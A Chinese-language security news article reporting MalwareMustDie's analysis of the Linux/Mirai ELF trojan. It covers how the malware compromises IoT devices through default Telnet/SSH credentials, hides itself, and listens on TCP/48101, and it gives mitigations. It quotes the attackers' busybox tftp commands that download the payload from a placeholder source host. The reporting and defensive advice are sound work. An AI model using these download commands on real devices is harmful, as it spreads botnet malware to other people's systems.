Linux/Mirai ELF :专门攻击物联网设备的恶意软件 | E安全

E安全9月7日讯 MalwareMustDie的专家发现了一款名为“ELF Linux/Mirai”的新型ELF木马后门,正针对物联网设备展开攻击。

MalwareMustDie专家八月分析了一个特殊的ELF木马后门样本—被称为ELF Linux/Mirai,目前该木马后门正针对物联网设备。这款恶意软件的名称与二进制“mirai.*”相同。据专家称,该恶意软件已发动数起攻击。

VirusTotal在线扫描服务公司证实,ELF Linux/Mirai十分隐秘,许多杀毒解决方案仍无法检测到,检测率极低。

MalwareMustDie博客中一份分析报告指出,“缺乏检测的原因在于缺乏样本,难以从受感染的物联网设备、路由器、DVR或WebIP摄像头和嵌入式平台中带有Busybox二进制的Linux中获取样本。”

Security Affairs检测的最后一个EFL为Linux木马Linux.PNScan,这款木马活跃针对x86 Linux路由器,设法安装后门。

但MalwareMustDie透露,Linux/Mirai比PnSan大得多。

分析指出,“这种威胁于8月初浮出水面,尽管这个ELF不易被检测,因为在安装后不会马上显示软件活动:只是静静待在这里,不会在系统中残留恶意软件,除了恶意软件运行的延迟过程外,所有文件均被删除。”

这就意味着当感染成功,难以通过未受感染的系统区分受感染的系统,除了内存分析。我们讨论的是一类不易分析并调试的设备。起初,对文件系统或外部网络流量的普通分析无法提供任何证据。

物联网环境不利。物联网塑造着新一类强大的僵尸网络,扩散至全球。哪个国家更易遭受此类攻击?

“具有Linux busybox嵌入式联网设备的国家,例如DVR或Web网络摄像头;以及通过在全球IP地址运行的Linux路由器为用户提供ISP服务的国家更易成为这类攻击的目标,尤其,未保护Telnet远程端口服务(Tcp/23)访问安全的设备或服务。”

“Linux/Mirai开发人员成功编码字符串并将流量分流来伪装自己。”

对于所有系统管理员最重要的是防御这类感染:与好朋友一起参与开放式过滤系统,安全工程师正努力推动—MalwareMustDie—正确的过滤签名提醒系统管理员是否遭受这类攻击威胁。在一个试点中,具有正确签名的系统管理员发现,仅仅几天内,攻击来源就有数百个地址。

似乎感染在扩散,僵尸网络似乎非常广泛。

这时,所有想要保护系统的系统管理员应当参看以下缓解措施:

  • 如果你具有物联网设备,请确保未打开 telnet 服务,该服务未运行。

  • 如果你未使用TCP/48101端口,请禁用,免于遭受感染和进一步损害。

  • 监控telnet连接,因为用户感染的僵尸网络协议为Telnet服务。

  • 逆向过程,寻找MalwareMustDie检测工具提示中报告的字符串。

然而,我们确切地知道Linux/Mirai ELF恶意软件,但为什么恶意软件分析专家却不热衷分析这款恶意软件?

MalwareMustDie表示,“很多人不知道此款恶意软件的原因在于杀毒专家认为它是Gafgyt或Bashlite或Bashdoor的变种。另外,此款软件的真实样本难以获取,因为许多恶意软件分析专家必须在受感染的设备内存上提取,或者入侵CNC获取。”

这就意味着,如果我们关掉受感染的设备,取证分析难上加难:所有信息会丢失,并且可能需要新的感染程序重新启动。

之前的ELF恶意软件版本之间的最大不同点是什么?

MalwareMustDie指出,“相比过去的类似威胁,攻击者目前具有不同策略—尽量潜伏(延缓)、不被检测(AV或流量过滤器中的低检测率)、不可见(未追踪,也没有样本提 取)、加密ELF的ASCII数据,保密分布。但很明显,攻击者的主要目的仍是DDoS僵尸网络,以通过他们所谓的Telnet扫描器快速将感染扩散至物 联网设备。”

这款ELF真正隐秘地方在于,唯一的追踪途径是从运行的设备中提取内存。

感染模式

攻击者通过SSH或Telnet账号利用已知漏洞或使用默认密码入侵物联网设备。

如果以现有设备的感染条件作为目标,这类ELF使用特定的技术分叉(fork)新的进程,否则节点即为安全,安装不会继续。

一旦获取设备的外壳访问,攻击者将下载ELF Linux/Mirai恶意软件的有效荷载,下方为在物联网设备上执行操作的命令:

‘busybox tftp‘ -r [MalwareFile] -g [IPsource]

‘busybox tftp‘ -g -l ‘dvrHelper’ -r [MalwareFile] [IPsource]

难以分析Linux/Mirai感染,原因在于一旦执行,恶意软件还能删除痕迹。

MalwareMustDie 团队表示,“Linux/Mirai感染的某些情况表明,该恶意软件在没有参数的情况下执行;某些情况下,执行后会删除下载的恶意软件文件。这种情况下, 通常无法获取样本,除非将恶意软件过程转储至ELF二进制。这就是难以获取这种新型威胁样本的原因。”

“一经执行,该恶意软件将自行删除,避免留下踪迹,但进程仍在运行。”在

lsof中能看见的一些物联网设备或带有特定PID的/proc列表,也就是:

/proc/{PID}/exe -> ‘/dev/.{something}/dvrHelper’ (删除)

/proc/{PID}/exe -> ‘./{长字母字符串}’ alphabet (删除)

进程运行的同时,恶意软件还打开PF_INET(TCP的UNIX网络套接字),并将它绑定到本地主机IP地址127.0.0.1的端口TCP/48101,之后开始侦听连入连接。这款恶意软件通过新进程PID分叉新进程。受感染的设备将在其它设备的Telnet服务上进行连接,进一步实 施滥用行为。

E安全注:本文系E安全编辑报道, 转载请联系授权 ,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang [email protected]

@E安全,最专业的前沿网络安全媒体和产业服务平台,每日提供优质全球网络安全资讯与深度思考,欢迎关注微信公众号「E安全」(EAQapp),或登E安全门户网站www.easyaq.com , 查看更多精彩内容。

  • 版权声明: 本文源自互联网, 于7个月前,由整理发表,共 2521字。
  • 原文链接:点此查看原文